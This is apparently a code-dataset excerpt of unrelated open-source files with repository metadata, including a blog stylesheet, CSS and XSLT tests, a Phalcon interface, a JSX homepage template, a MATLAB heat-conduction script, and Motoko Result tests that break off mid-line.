.blog-header, .blog-roll-card .blog-header { border-bottom: 1px solid rgba(0, 0, 0, 0.1); /* changes for Image tag */ width: 100%; height: 200px; position: relative; /* end of changes for Image tag */ } .single-blog .blog-header h5, .single-post .blog-header h5, .blog-roll-card .blog-header h5 { font-size: 18px; margin-bottom: 20px; } .single-blog .blog-header h2, .single-post .blog-header h2, .blog-roll-card .blog-header h2 { font-size: 40px; margin-bottom: 30px; } .single-blog .blog-header h2 span, .single-post .blog-header h2 span, .blog-roll-card .blog-header h2 span { font-size: 16px; color: rgba(0, 0, 0, 0.5); font-weight: 400; } .single-blog .blog-body, .single-post .blog-body, .blog-roll-card .blog-body { padding-top: 30px; padding-bottom: 25px; } .single-blog .blog-body ul li, .single-post .blog-body ul li, .blog-roll-card .blog-body ul li { display: flex; align-items: center; margin-bottom: 12px; } .single-blog .blog-body ul li span.bolet, .single-post .blog-body ul li span.bolet, .blog-roll-card .blog-body ul li span.bolet { width: 8px; height: 8px; border-radius: 50%; margin-right: 13px; background: rgba(0, 0, 0, 0.2); } .single-blog .blog-body ul li span.bolet.active, .single-post .blog-body ul li span.bolet.active, .blog-roll-card .blog-body ul li span.bolet.active { background: #37c2cc; } .single-blog .blog-body ul li p, .single-post .blog-body ul li p, .blog-roll-card .blog-body ul li p { margin-bottom: 0px; } .single-blog .blog-footer .main-btn, .single-blog .blog-roll-card-footer .main-btn, .single-post .blog-footer .main-btn, .single-post .blog-roll-card-footer .main-btn, .blog-roll-card .blog-footer .main-btn, .blog-roll-card .blog-roll-card-footer .main-btn { color: #37c2cc; background: #e3fdff; } .single-blog .blog-footer .main-btn:hover, .single-blog .blog-roll-card-footer .main-btn:hover, .single-post .blog-footer .main-btn:hover, .single-post .blog-roll-card-footer .main-btn:hover, .blog-roll-card .blog-footer .main-btn:hover, .blog-roll-card .blog-roll-card-footer .main-btn:hover { color: #fff; } .single-blog .blog-footer .main-btn:hover::after, .single-blog .blog-roll-card-footer .main-btn:hover::after, .single-post .blog-footer .main-btn:hover::after, .single-post .blog-roll-card-footer .main-btn:hover::after, .blog-roll-card .blog-footer .main-btn:hover::after, .blog-roll-card .blog-roll-card-footer .main-btn:hover::after { background: #37c2cc; } .single-blog.standard::after, .standard.single-post::after, .standard.blog-roll-card::after { content: ''; position: absolute; background: #37c2cc; border-radius: 50%; z-index: -1; width: 150px; height: 150px; top: -70px; right: -50px; } .single-blog.standard .blog-footer .main-btn, .single-blog.standard .blog-roll-card-footer .main-btn, .standard.single-post .blog-footer .main-btn, .standard.single-post .blog-roll-card-footer .main-btn, .standard.blog-roll-card .blog-footer .main-btn, .standard.blog-roll-card .blog-roll-card-footer .main-btn { color: #fff; background: #37c2cc; } .single-blog.standard .blog-footer .main-btn:hover::after, .single-blog.standard .blog-roll-card-footer .main-btn:hover::after, .standard.single-post .blog-footer .main-btn:hover::after, .standard.single-post .blog-roll-card-footer .main-btn:hover::after, .standard.blog-roll-card .blog-footer .main-btn:hover::after, .standard.blog-roll-card .blog-roll-card-footer .main-btn:hover::after { background: rgba(0, 0, 0, 0.05); } .single-blog div:first-of-type, .single-post div:first-of-type, .blog-roll-card div:first-of-type { padding-top: 0; } .single-post-nav, .blog-roll-nav { align-items: center; background: linear-gradient( 180deg, #c2fbff 0%, rgba(255, 255, 255, 0) 93.47% ); display: flex; height: 400px; overflow: hidden; position: relative; z-index: 1; } @media only screen and (min-width: 550px) { .single-post-nav, .blog-roll-nav { height: 350px; } } @media only screen and (min-width: 768px) { .single-post-nav, .blog-roll-nav { height: 430px; } } .breadcrumb-nav { display: flex; flex-direction: column; justify-content: center; margin-top: 1em; } @media only screen and (min-width: 550px) { .breadcrumb-nav { flex-direction: row; } } .breadcrumb-nav li a { color: #37c2cc; font-weight: 500; display: inline-block; position: relative; padding-right: 15px; margin-right: 15px; text-transform: capitalize; } .breadcrumb-nav li::after { content: ''; font-size: 10px; position: relative; font-family: lineIcons; right: 11px; } .breadcrumb-nav li:last-child::after { content: ''; } .single-post, .blog-roll-card { padding: 0px; } .single-post div:first-of-type, .blog-roll-card div:first-of-type { padding-top: 30px; } .single-post-meta, .blog-roll-card-meta { padding: 30px 16px 0 16px; } @media only screen and (min-width: 550px) { .single-post-meta, .blog-roll-card-meta { padding: 42px 24px 0 24px; } } @media only screen and (min-width: 768px) { .single-post-meta, .blog-roll-card-meta { padding: 52px 30px 0 30px; } } .single-post-header, .blog-roll-card-header { margin-bottom: 20px; } .single-post-meta-info, .blog-roll-card-meta-info { font-size: 14px; display: inline-block; position: relative; } .single-post-meta-info li, .blog-roll-card-meta-info li { font-size: 14px; display: inline-block; margin-right: 15px; padding-right: 15px; position: relative; } .single-post-meta-info li a, .blog-roll-card-meta-info li a { color: #888; font-size: 14px; font-weight: 500; } .single-post-meta-info li a img, .blog-roll-card-meta-info li a img { height: 35px; width: 35px; border-radius: 50%; display: inline-block; margin-right: 12px; } @media only screen and (min-width: 550px) { .single-post-meta-info li a img, .blog-roll-card-meta-info li a img { height: 35px; width: 35px; } } @media only screen and (min-width: 768px) { .single-post-meta-info li a img, .blog-roll-card-meta-info li a img { height: 50px; width: 50px; } } @media only screen and (min-width: 768px) { .single-post-meta-info li::before, .blog-roll-card-meta-info li::before { position: absolute; content: ''; right: -5px; top: 50%; background-color: #d2d2d2; height: 5px; width: 5px; border-radius: 50%; -webkit-transform: translateY(-50%); transform: translateY(-50%); } } @media only screen and (min-width: 768px) { .single-post-meta-info li:last-of-type::before, .blog-roll-card-meta-info li:last-of-type::before { content: none; } } .single-post-thumbnail { position: relative; overflow: hidden; border-radius: 0; width: 100%; margin-top: 15px; /* changes for Image tag */ height: 300px; /* end of changes for Image tag */ } .single-post-thumbnail img { width: 100%; } @media only screen and (min-width: 550px) { .single-post-thumbnail { margin-top: 42px; } } @media only screen and (min-width: 768px) { .single-post-thumbnail { margin-top: 52px; } } .single-post-body, .blog-roll-card-body { padding: 30px 16px; } @media only screen and (min-width: 550px) { .single-post-body, .blog-roll-card-body { padding: 42px 24px; } } @media only screen and (min-width: 768px) { .single-post-body, .blog-roll-card-body { padding: 52px 30px; } } .single-post-body h3, .blog-roll-card-body h3, .single-post-body .single-post-header, .blog-roll-card-body .single-post-header, .single-post-body .blog-roll-card-header, .blog-roll-card-body .blog-roll-card-header { margin-top: 10px; margin-bottom: 20px; } .single-post-body p, .blog-roll-card-body p { margin-bottom: 20px; } .single-post-body figure img, .blog-roll-card-body figure img { max-width: 100%; } @media only screen and (min-width: 768px) { .blog-roll-card .single-post-thumbnail { margin-top: 30px; } } .blog-roll-card-meta { padding: 15px 15px 0 15px; } @media only screen and (min-width: 768px) { .blog-roll-card-meta { padding: 30px 30px 0 30px; } } .blog-roll-card-header a { color: rgba(0, 0, 0, 0.7); } .blog-roll-card-header a:hover { color: #37c2cc; } .blog-roll-card-body { padding: 15px 15px 5px; } @media only screen and (min-width: 768px) { .blog-roll-card-body { padding: 30px 30px 10px; } } .blog-roll-card-footer { padding: 0px 15px 15px; } @media only screen and (min-width: 768px) { .blog-roll-card-footer { padding: 0 30px 30px; } } /* ===================== TEAM SECTION CSS ======================== */ .team-section .single-team { position: relative; margin-bottom: 50px; } .team-section .single-team .team-image { max-width: 313px; width: 100%; border-radius: 50%; } .team-section .single-team .team-image img { width: 100%; } .team-section .single-team .team-info { position: absolute; bottom: 30px; right: 0; background: #fff; -webkit-box-shadow: 0px 8px 25px rgba(211, 211, 211, 0.25); -moz-box-shadow: 0px 8px 25px rgba(211, 211, 211, 0.25); box-shadow: 0px 8px 25px rgba(211, 211, 211, 0.25); padding: 20px 30px; min-width: 210px; text-align: center; } .team-section .single-team .team-info h4 { font-size: 20px; margin-bottom: 5px; } .team-section .single-team .team-info p { font-size: 14px; } /* ======================== TESTIMONIAL CSS =========================== */ .testimonial-section { background-image: url('../public/images/testimonial/testimonial-bg.svg'); background-size: cover; background-position: bottom center; padding-top: 75px; padding-bottom: 130px; border-radius: 333px 0px; position: relative; z-index: 1; } @media only screen and (min-width: 1200px) and (max-width: 1399px) { .testimonial-section { border-radius: 200px 0px; } } @media only screen and (min-width: 992px) and (max-width: 1199px) { .testimonial-section { border-radius: 100px 0px; } } @media only screen and (min-width: 768px) and (max-width: 991px), (max-width: 767px) { .testimonial-section { border-radius: 70px 0px; } } .testimonial-section .testimonial-active-wrapper { position: relative; } @media (max-width: 767px) { .testimonial-section .testimonial-active-wrapper { padding-bottom: 80px; } } .testimonial-section .testimonial-active-wrapper .tns-controls { position: absolute; right: 0; bottom: 0; width: 100%; z-index: 2; display: flex; align-items: center; justify-content: flex-end; } @media (max-width: 767px) { .testimonial-section .testimonial-active-wrapper .tns-controls { justify-content: center; } } .testimonial-section .testimonial-active-wrapper .tns-controls button { width: 55px; height: 55px; display: flex; align-items: center; justify-content: center; border-radius: 50%; background: #fff; color: rgba(0, 0, 0, 0.9); border: 1px solid #37c2cc; -webkit-transition: all 0.3s ease-out 0s; -moz-transition: all 0.3s ease-out 0s; -ms-transition: all 0.3s ease-out 0s; -o-transition: all 0.3s ease-out 0s; transition: all 0.3s ease-out 0s; margin: 0 5px; } .testimonial-section .testimonial-active-wrapper .tns-controls button:hover { background: #37c2cc; color: #fff; } .testimonial-section .testimonial-active-wrapper .single-testimonial { text-align: center; } .testimonial-section .testimonial-active-wrapper .single-testimonial .quote { font-size: 55px; line-height: 1; color: #37c2cc; margin-bottom: 20px; } .testimonial-section .testimonial-active-wrapper .single-testimonial .content { margin-bottom: 30px; } .testimonial-section .testimonial-active-wrapper .single-testimonial .content p { font-size: 22px; line-height: 35px; color: rgba(0, 0, 0, 0.7); padding: 0 15px; } @media (max-width: 767px) { .testimonial-section .testimonial-active-wrapper .single-testimonial .content p { font-size: 18px; line-height: 28px; padding: 0px; } } .testimonial-section .testimonial-active-wrapper .single-testimonial .info h6 { font-size: 16px; font-weight: 700; margin-bottom: 10px; } .testimonial-section .testimonial-active-wrapper .single-testimonial .info p { font-size: 15px; } .testimonial-section .testimonial-images .testimonial-image { position: absolute; z-index: -1; max-width: 100%; } @media only screen and (min-width: 768px) and (max-width: 991px), (max-width: 767px) { .testimonial-section .testimonial-images .testimonial-image { display: none; } } .testimonial-section .testimonial-images .testimonial-image.image-1 { left: 10%; top: 30%; } .testimonial-section .testimonial-images .testimonial-image.image-2 { bottom: 5%; left: 15%; } .testimonial-section .testimonial-images .testimonial-image.image-3 { top: 5%; right: 10%; } .testimonial-section .testimonial-images .testimonial-image.image-4 { top: 40%; right: 12%; } @media only screen and (min-width: 992px) and (max-width: 1199px) { .testimonial-section .testimonial-images .testimonial-image.image-4 { right: 8%; } } /* ========================== FOOTER CSS ============================= */ .footer .footer-widget { margin-bottom: 50px; } .footer .footer-widget .logo { margin-bottom: 30px; } .footer .footer-widget .desc { margin-bottom: 25px; } .footer .footer-widget .social-links { display: flex; align-items: center; } .footer .footer-widget .social-links li a { width: 44px; height: 44px; border-radius: 50%; background: #e3fdff; color: rgba(0, 0, 0, 0.9); display: flex; align-items: center; justify-content: center; margin-right: 18px; font-size: 22px; } .footer .footer-widget .social-links li a:hover { background: #37c2cc; color: #fff; } .footer .footer-widget h3, .footer .footer-widget .single-post-header, .footer .footer-widget .blog-roll-card-header { margin-bottom: 30px; margin-top: 10px; } .footer .footer-widget .links li a { font-size: 16px; line-height: 30px; color: rgba(0, 0, 0, 0.7); } .footer .footer-widget .links li a:hover { padding-left: 8px; color: #37c2cc; } .footer .footer-widget form { display: flex; flex-direction: column; align-items: flex-end; } .footer .footer-widget form input { width: 100%; background: #f1feff; border: 1px solid #37c2cc; box-sizing: border-box; border-radius: 10px; margin-bottom: 20px; padding: 15px 20px; } .footer .footer-widget form button { text-align: right; } /* ====================== DEFAULT CSS ========================= */ .mt-5 { margin-top: 5px; } .mt-10 { margin-top: 10px; } .mt-15 { margin-top: 15px; } .mt-20 { margin-top: 20px; } .mt-25 { margin-top: 25px; } .mt-30 { margin-top: 30px; } .mt-35 { margin-top: 35px; } .mt-40 { margin-top: 40px; } .mt-45 { margin-top: 45px; } .mt-50 { margin-top: 50px; } .mt-55 { margin-top: 55px; } .mt-60 { margin-top: 60px; } .mt-65 { margin-top: 65px; } .mt-70 { margin-top: 70px; } .mt-75 { margin-top: 75px; } .mt-80 { margin-top: 80px; } .mt-85 { margin-top: 85px; } .mt-90 { margin-top: 90px; } .mt-95 { margin-top: 95px; } .mt-100 { margin-top: 100px; } .mt-105 { margin-top: 105px; } .mt-110 { margin-top: 110px; } .mt-115 { margin-top: 115px; } .mt-120 { margin-top: 120px; } .mt-125 { margin-top: 125px; } .mt-130 { margin-top: 130px; } .mt-135 { margin-top: 135px; } .mt-140 { margin-top: 140px; } .mt-145 { margin-top: 145px; } .mt-150 { margin-top: 150px; } .mt-155 { margin-top: 155px; } .mt-160 { margin-top: 160px; } .mt-165 { margin-top: 165px; } .mt-170 { margin-top: 170px; } .mt-175 { margin-top: 175px; } .mt-180 { margin-top: 180px; } .mt-185 { margin-top: 185px; } .mt-190 { margin-top: 190px; } .mt-195 { margin-top: 195px; } .mt-200 { margin-top: 200px; } .mt-205 { margin-top: 205px; } .mt-210 { margin-top: 210px; } .mt-215 { margin-top: 215px; } .mt-220 { margin-top: 220px; } .mt-225 { margin-top: 225px; } .mb-5 { margin-bottom: 5px; } .mb-10 { margin-bottom: 10px; } .mb-15 { margin-bottom: 15px; } .mb-20 { margin-bottom: 20px; } .mb-25 { margin-bottom: 25px; } .mb-30 { margin-bottom: 30px; } .mb-35 { margin-bottom: 35px; } .mb-40 { margin-bottom: 40px; } .mb-45 { margin-bottom: 45px; } .mb-50 { margin-bottom: 50px; } .mb-55 { margin-bottom: 55px; } .mb-60 { margin-bottom: 60px; } .mb-65 { margin-bottom: 65px; } .mb-70 { margin-bottom: 70px; } .mb-75 { margin-bottom: 75px; } .mb-80 { margin-bottom: 80px; } .mb-85 { margin-bottom: 85px; } .mb-90 { margin-bottom: 90px; } .mb-95 { margin-bottom: 95px; } .mb-100 { margin-bottom: 100px; } .mb-105 { margin-bottom: 105px; } .mb-110 { margin-bottom: 110px; } .mb-115 { margin-bottom: 115px; } .mb-120 { margin-bottom: 120px; } .mb-125 { margin-bottom: 125px; } .mb-130 { margin-bottom: 130px; } .mb-135 { margin-bottom: 135px; } .mb-140 { margin-bottom: 140px; } .mb-145 { margin-bottom: 145px; } .mb-150 { margin-bottom: 150px; } .mb-155 { margin-bottom: 155px; } .mb-160 { margin-bottom: 160px; } .mb-165 { margin-bottom: 165px; } .mb-170 { margin-bottom: 170px; } .mb-175 { margin-bottom: 175px; } .mb-180 { margin-bottom: 180px; } .mb-185 { margin-bottom: 185px; } .mb-190 { margin-bottom: 190px; } .mb-195 { margin-bottom: 195px; } .mb-200 { margin-bottom: 200px; } .mb-205 { margin-bottom: 205px; } .mb-210 { margin-bottom: 210px; } .mb-215 { margin-bottom: 215px; } .mb-220 { margin-bottom: 220px; } .mb-225 { margin-bottom: 225px; } .pt-5 { padding-top: 5px; } .pt-10 { padding-top: 10px; } .pt-15 { padding-top: 15px; } .pt-20 { padding-top: 20px; } .pt-25 { padding-top: 25px; } .pt-30 { padding-top: 30px; } .pt-35 { padding-top: 35px; } .pt-40 { padding-top: 40px; } .pt-45 { padding-top: 45px; } .pt-50 { padding-top: 50px; } .pt-55 { padding-top: 55px; } .pt-60 { padding-top: 60px; } .pt-65 { padding-top: 65px; } .pt-70 { padding-top: 70px; } .pt-75 { padding-top: 75px; } .pt-80 { padding-top: 80px; } .pt-85 { padding-top: 85px; } .pt-90 { padding-top: 90px; } .pt-95 { padding-top: 95px; } .pt-100 { padding-top: 100px; } .pt-105 { padding-top: 105px; } .pt-110 { padding-top: 110px; } .pt-115 { padding-top: 115px; } .pt-120 { padding-top: 120px; } .pt-125 { padding-top: 125px; } .pt-130 { padding-top: 130px; } .pt-135 { padding-top: 135px; } .pt-140 { padding-top: 140px; } .pt-145 { padding-top: 145px; } .pt-150 { padding-top: 150px; } .pt-155 { padding-top: 155px; } .pt-160 { padding-top: 160px; } .pt-165 { padding-top: 165px; } .pt-170 { padding-top: 170px; } .pt-175 { padding-top: 175px; } .pt-180 { padding-top: 180px; } .pt-185 { padding-top: 185px; } .pt-190 { padding-top: 190px; } .pt-195 { padding-top: 195px; } .pt-200 { padding-top: 200px; } .pt-205 { padding-top: 205px; } .pt-210 { padding-top: 210px; } .pt-215 { padding-top: 215px; } .pt-220 { padding-top: 220px; } .pt-225 { padding-top: 225px; } .pb-5 { padding-bottom: 5px; } .pb-10 { padding-bottom: 10px; } .pb-15 { padding-bottom: 15px; } .pb-20 { padding-bottom: 20px; } .pb-25 { padding-bottom: 25px; } .pb-30 { padding-bottom: 30px; } .pb-35 { padding-bottom: 35px; } .pb-40 { padding-bottom: 40px; } .pb-45 { padding-bottom: 45px; } .pb-50 { padding-bottom: 50px; } .pb-55 { padding-bottom: 55px; } .pb-60 { padding-bottom: 60px; } .pb-65 { padding-bottom: 65px; } .pb-70 { padding-bottom: 70px; } .pb-75 { padding-bottom: 75px; } .pb-80 { padding-bottom: 80px; } .pb-85 { padding-bottom: 85px; } .pb-90 { padding-bottom: 90px; } .pb-95 { padding-bottom: 95px; } .pb-100 { padding-bottom: 100px; } .pb-105 { padding-bottom: 105px; } .pb-110 { padding-bottom: 110px; } .pb-115 { padding-bottom: 115px; } .pb-120 { padding-bottom: 120px; } .pb-125 { padding-bottom: 125px; } .pb-130 { padding-bottom: 130px; } .pb-135 { padding-bottom: 135px; } .pb-140 { padding-bottom: 140px; } .pb-145 { padding-bottom: 145px; } .pb-150 { padding-bottom: 150px; } .pb-155 { padding-bottom: 155px; } .pb-160 { padding-bottom: 160px; } .pb-165 { padding-bottom: 165px; } .pb-170 { padding-bottom: 170px; } .pb-175 { padding-bottom: 175px; } .pb-180 { padding-bottom: 180px; } .pb-185 { padding-bottom: 185px; } .pb-190 { padding-bottom: 190px; } .pb-195 { padding-bottom: 195px; } .pb-200 { padding-bottom: 200px; } .pb-205 { padding-bottom: 205px; } .pb-210 { padding-bottom: 210px; } .pb-215 { padding-bottom: 215px; } .pb-220 { padding-bottom: 220px; } .pb-225 { padding-bottom: 225px; } .widget { background: #fff; box-shadow: 0px 0px 50px rgba(183, 199, 240, 0.25); border-radius: 14px; padding: 30px; margin-bottom: 30px; position: relative; overflow: hidden; z-index: 1; } .widget form { position: relative; } .widget form input { background-color: transparent; border-radius: 5px; border: 1px solid #37c2cc; font-size: 14px; font-weight: 400; height: 55px; padding: 0 70px 0 30px; width: 100%; } .widget form button { border: none; position: absolute; right: 7px; top: 6px; width: 42px; height: 42px; z-index: 1; color: #fff !important; font-size: 13px; -webkit-transition: all 0.3s ease-out 0s; transition: all 0.3s ease-out 0s; color: #fff; border-radius: 5px; padding: 0 !important; border: none; background: #37c2cc; } .widget-title { font-size: 22px; margin-bottom: 30px; position: relative; font-weight: 600; line-height: 28px; z-index: 1; } .categories-widget .categories-list li { display: inline; } .categories-widget .categories-list li > a { -ms-flex-pack: center; -webkit-box-pack: center; background: 0 0; border-radius: 5px; border: 1px solid #37c2cc; color: rgba(0, 0, 0, 0.7); display: -ms-inline-flexbox; display: -webkit-inline-box; display: inline-flex; font-size: 14px; font-weight: 400; justify-content: center; margin-bottom: 10px; margin-right: 5px; padding: 7px 15px; text-transform: capitalize; } .categories-widget .categories-list li > a:hover { background-color: #37c2cc; color: #fff; border-color: transparent; } /*# sourceMappingURL=main.css.map */
CSS
3
hanneslund/next.js
examples/cms-buttercms/css/main.css
[ "MIT" ]
@font-feature-values Font One { @styleset { nice-style: 12; } } @font-feature-values Font One { @styleset { nice-style: 12; } } @font-feature-values Font One{ @styleset{ nice-style: 12; } } @font-feature-values Font One { @styleset { nice-style: 12; } } @font-feature-values Font One { @styleset { nice-style : 12 ; } } @font-feature-values Font One { @styleset { nice-style : 12 ; } }
CSS
2
fuelingtheweb/prettier
tests/css_atrule/font-feature-values.css
[ "MIT" ]
<?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:output method="text" encoding="UTF-8"/> <xsl:key name="area" match="ROW" use="substring(translate(AREA_NAME, '&quot;', ''), 1, 1)"/> <xsl:template match="*"> HERE </xsl:template> </xsl:stylesheet>
XSLT
3
donsbot/hhvm
hphp/test/zend/good/ext/xsl/tests/area_list.xsl
[ "PHP-3.01", "Zend-2.0" ]
/** * This file is part of the Phalcon Framework. * * (c) Phalcon Team <team@phalcon.io> * * For the full copyright and license information, please view the LICENSE.txt * file that was distributed with this source code. */ namespace Phalcon\Db; /** * Interface for Phalcon\Db\Reference */ interface ReferenceInterface { /** * Gets local columns which reference is based */ public function getColumns() -> array; /** * Gets the index name */ public function getName() -> string; /** * Gets the referenced on delete */ public function getOnDelete() -> string; /** * Gets the referenced on update */ public function getOnUpdate() -> string; /** * Gets referenced columns */ public function getReferencedColumns() -> array; /** * Gets the schema where referenced table is */ public function getReferencedSchema() -> string; /** * Gets the referenced table */ public function getReferencedTable() -> string; /** * Gets the schema where referenced table is */ public function getSchemaName() -> string; }
Zephir
4
tidytrax/cphalcon
phalcon/Db/ReferenceInterface.zep
[ "BSD-3-Clause" ]
? $_mt->wrapper_file("wrapper.mt")->(sub { <style type="text/css"> #charts { text-align: center; } #main #charts table { border: 0px; text-align: center; table-layout: fixed; } #main #charts table td { margin: 0; border: 0px; padding: 0.5em 1em; } #main #charts table .caption { font-weight: bold; font-size: 80%; text-align: center; margin: 0; } #main #charts table img { border: 1px solid #ccc; } #subview { margin: 2em 50px 20px 20px; width: 250px; float: right; } #start { padding: 15px 20px; margin-bottom: 1em; background: #ddf; border-radius: 10px; } #start h2 { font-size: 100%; margin: 0 0 0.5em 0; } </style> <title>JSX - a faster, safer, easier JavaScript</title> ?= $_mt->render_file("header.mt") <div id="subview"> <div id="start"> <h2>Getting Started</h2> <div> Try our <a href="try-on-web/" target="_blank">playground</a> or follow the <a href="doc/tutorial.html">tutorial</a> to start using JSX. </div> </div> <a class="twitter-timeline" href="https://twitter.com/search?q=%23JSX+%23update+from%3Akazuho+OR+from%3A__gfx__+OR+from%3Atkihira+OR+from%3Awasabiz" data-widget-id="345651188034838528">Update from Twitter</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+"://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script> </div> <div id="main"> <h2 id="intro">What is JSX?</h2> <div> JSX is a statically-typed, object-oriented programming language designed to run on modern web browsers. Being developed at <a href="http://dena.com/intl/" target="_blank">DeNA</a> as a research project, the language has following characteristics. </div> <dl> <dt>faster</dt> <dd> JSX performs optimization while compiling the source code to JavaScript. The generated code runs faster than an equivalent code written directly in JavaScript. The gain may vary, but even the optimized JavaScript libraries like Box2D becomes faster when ported to JSX (<a href="http://www.slideshare.net/kazuho/jsx-optimizer" target="_blank">12% faster on iOS 5.1, 29% faster on Android 2.3</a>). </dd> <dt>safer</dt> <dd> In contrast to JavaScript, JSX is statically-typed and mostly type-safe. The quality of applications becomes higher when being developed using JSX, since many errors will be caught during the compilation process. It also offers debugging features at the compiler level as well. </dd> <dt>easier</dt> <dd> JSX offers a solid class system much like Java, freeing the developers from working with the too-primitive prototype-based inheritance system provided by JavaScript. Expressions and statements, however, are mostly equal to JavaScript, so it is easy for JavaScript programmers to start using JSX. There are also plans on language-services for editors / IDEs, for example <a href="https://github.com/jsx/jsx.vim#code-completion">code completion</a>, to make coding easiler. </dl> <div id="charts"> <table align="center"> <tr> <td> <a href="images/benchmarks.png" target="_blank"><img src="images/benchmarks.png" width="225" height="150"></a> <div class="caption"> Benchmarks </div> </td> <td> <a href="images/source-code-debugger.png" target="_blank"><img src="images/source-code-debugger.png" width="225" height="150"></a> <div class="caption"> Source-code debugger </div> </td> </table> </div> <h2 id="examples">Examples</h2> <div id="charts"> <table align="center"> <tr> <td> <a href="examples/fireworks/fireworks.html" target="_blank"><img src="images/fireworks.png" width="150" height="225"></a> <div class="caption"> <a href="examples/fireworks/fireworks.html" target="_blank">Fireworks</a> (<a href="examples/fireworks/fireworks.jsx" target="_blank">source</a>) </div> </td> <td> <a href="examples/shooting/shooting.html" target="_blank"><img src="images/shooting.png" width="150" height="225"></a> <div class="caption"> <a href="examples/shooting/shooting.html" target="_blank">Shooting</a> (<a href="examples/shooting/shooting.jsx" target="_blank">source</a>) </div> </td> <td> <a href="examples/box2d/box2djsx.html" target="_blank"><img src="images/box2d.png" width="150" height="225"></a> <div class="caption"> <a href="examples/box2d/box2djsx.html" target="_blank">Box2D.jsx</a> (<a href="https://github.com/tkihira/box2djsx/tree/kazuho/optimize" target="_blank">source</a>) </div> </td> </tr> </table> </div> <div> The examples are best viewed on iPhone. </div> <h2 id="other">Other Resources</h2> <div> <p> A slide describing the objectives of JSX can be found <a href="http://www.slideshare.net/kazuho/jsx">here</a>. </p> <p> There is <a href="https://github.com/jsx/JSX/wiki">JSX wiki</a> to gather JSX resources. </p> </div> </div> ? })
Mathematica
3
monkpit/JSX
doc/src/index.mt
[ "MIT" ]
clc clear all %% Variáveis comprimento = 10; largura = 10; pontos = comprimento*largura; TS = 550; HS = 2; TI = 550; HI = 2; iteracoes = 10^4; k = 230; for i = 1:1:comprimento T(i,1) = 0; O(i,1) = T(i,1); T(i,comprimento) = 750; O(i,comprimento) = T(i,comprimento); end for i = 1:1:comprimento T(i,1) = 760; O(i,1) = T(i,1); T(i,1) = 760; O(i,comprimento) = T(i,comprimento); end for z = 2:largura-1 T(largura,z) = (2*(T(1+1,z) + T(1,z+1) + T(1,z-1) + (2*HI*pontos*TI)/k)/(4+(2*HI*pontos)/k)); end for z = 2:largura-1 T(1,z) = (2*(T(1+1,z) + T(1,z+1) + T(1,z-1) + (2*HS*pontos*TS)/k)/(4+(2*HS*pontos)/k)); end T(1,1) = [T(1,2)+T(2,1)]/2; T(comprimento,1) =[T(comprimento-1,1)+T(largura,2)]/2; T(1,largura) = [T(1,largura-1)+T(2,largura)]/2; T(comprimento,largura) = [T(comprimento,largura-1)+T(comprimento-1,largura)]/2; for k = 2:1:comprimento-1 for l = 2:1:largura - 1 T(k,l) = 27; I(k,l) = T(l,k); end end for x = 1:1:iteracoes for y = 2:1:comprimento-1 for z = 2:1:largura-1 T(y,z) = [T(y+1,z)+ T(y-1,y)+ T(y,z+1)+ T(y,z-1)]/4; end end end figure(1) contourf(T,'ShowText','on') title('Temperaturas (ºC)')
Matlab
3
serjinTOP/consumo
TRANSCAL/IANNE 2/IANNE2.matlab
[ "MIT" ]
import x from "./x"; export default "f" + x;
JavaScript
2
1shenxi/webpack
test/statsCases/split-chunks-combinations/f.js
[ "MIT" ]
cpdef str get_rule_month(str source) cpdef quarter_to_myear(int year, int quarter, str freq)
Cython
1
k-fillmore/pandas
pandas/_libs/tslibs/parsing.pxd
[ "PSF-2.0", "Apache-2.0", "BSD-3-Clause-No-Nuclear-License-2014", "MIT", "ECL-2.0", "BSD-3-Clause" ]
// Test that negating unsigned integers doesn't compile struct S; impl std::ops::Neg for S { type Output = u32; fn neg(self) -> u32 { 0 } } fn main() { let _max: usize = -1; //~^ ERROR cannot apply unary operator `-` to type `usize` let x = 5u8; let _y = -x; //~^ ERROR cannot apply unary operator `-` to type `u8` -S; // should not trigger the gate; issue 26840 }
Rust
4
Eric-Arellano/rust
src/test/ui/feature-gates/feature-gate-negate-unsigned.rs
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
"""Tests for the Freedompro integration."""
Python
0
MrDelik/core
tests/components/freedompro/__init__.py
[ "Apache-2.0" ]
1 metro 0.1 0.1 tenv2 400 0.1 tri *
SourcePawn
0
aleatoricforest/Sporth
examples/tenv2.sp
[ "MIT" ]
import Result "mo:base/Result"; import Int "mo:base/Int"; import Array "mo:base/Array"; import List "mo:base/List"; import Suite "mo:matchers/Suite"; import M "mo:matchers/Matchers"; import T "mo:matchers/Testable"; func makeNatural(x : Int) : Result.Result<Nat, Text> = if (x >= 0) { #ok(Int.abs(x)) } else { #err(Int.toText(x) # " is not a natural number.") }; func largerThan10(x : Nat) : Result.Result<Nat, Text> = if (x > 10) { #ok(x) } else { #err(Int.toText(x) # " is not larger than 10.") }; let chain = Suite.suite("chain", [ Suite.test("ok -> ok", Result.chain<Nat, Nat, Text>(makeNatural(11), largerThan10), M.equals(T.result<Nat,Text>(T.natTestable, T.textTestable, #ok(11))) ), Suite.test("ok -> err", Result.chain<Nat, Nat, Text>(makeNatural(5), largerThan10), M.equals(T.result<Nat,Text>(T.natTestable, T.textTestable, #err("5 is not larger than 10."))) ), Suite.test("err", Result.chain<Nat, Nat, Text>(makeNatural(-5), largerThan10), M.equals(T.result<Nat,Text>(T.natTestable, T.textTestable, #err("-5 is not a natural number."))) ), ]); let flatten = Suite.suite("flatten", [ Suite.test("ok -> ok", Result.flatten<Nat, Text>(#ok(#ok(10))), M.equals(T.result<Nat,Text>(T.natTestable, T.textTestable, #ok(10))) ), Suite.test("err", Result.flatten<Nat, Text>(#err("wrong")), M.equals(T.result<Nat,Text>(T.natTestable, T.textTestable, #err("wrong"))) ), Suite.test("ok -> err", Result.flatten<Nat, Text>(#ok(#err("wrong"))), M.equals(T.result<Nat,Text>(T.natTestable, T.textTestable, #err("wrong"))) ), ]); let iterate = Suite.suite("iterate", do { var tests : [Suite.Suite] = []; var counter : Nat = 0; Result.iterate(makeNatural(5), func (x : Nat) { counter += x }); tests := Array.append(tests, [Suite.test("ok", counter, M.equals(T.nat(5)))]); Result.iterate(makeNatural(-10), func (x : Nat) { counter += x }); tests := Array.append(tests, [Suite.test("err", counter, 